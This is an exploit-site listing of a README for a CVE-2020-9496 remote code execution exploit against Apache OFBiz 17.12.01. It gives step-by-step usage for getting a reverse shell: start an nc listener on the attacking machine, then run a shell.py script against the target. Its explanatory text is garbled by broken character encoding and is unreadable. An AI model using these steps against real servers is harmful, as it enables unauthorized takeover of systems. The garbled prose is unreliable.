Sploitus

Exploit for CVE-2020-9496

kitploit ┬╖ 2026-08-28

Exploit Code

MARKDOWN26 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LY0NT4R-CVE-2020-9496
# CVE-2020-9496

ApacheOfBiz 17.12.01 - рдЕрдирдзрд┐рдХреГрдд рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди

XML-RPC рдЕрдиреБрд░реЛрдз рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдбрд┐рд╕реАрд░рд┐рдпрд▓рд╛рдЗрдЬрд╝реЗрд╢рди рдХреЗ рд▓рд┐рдП рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИрдВред

# рдЪрд░рдг

## рдЪрд░рдг 1:

`pip3 install -r requeriments.txt`

## рдЪрд░рдг 2:

`nc -nlvp <port>` # рд╣рдорд▓рд╛ рдХрдВрдкреНрдпреВрдЯрд░

## рдЪрд░рдг 3:

`python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port>`

## рдЪрд░рдг 4:

**рдЖрдкрдХреЗ рдкрд╛рд╕ рдЕрдкрдиреЗ nc рд▓рд┐рд╕рдирд░ рдореЗрдВ рдПрдХ рд╢реЗрд▓ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП**

![shell](https://assets.kitploit.com/production/public/readmes/37649/194e3449c48038d790b367706ee573c2f39b6d16cbc67443f85cd05106fc4c7e.gif)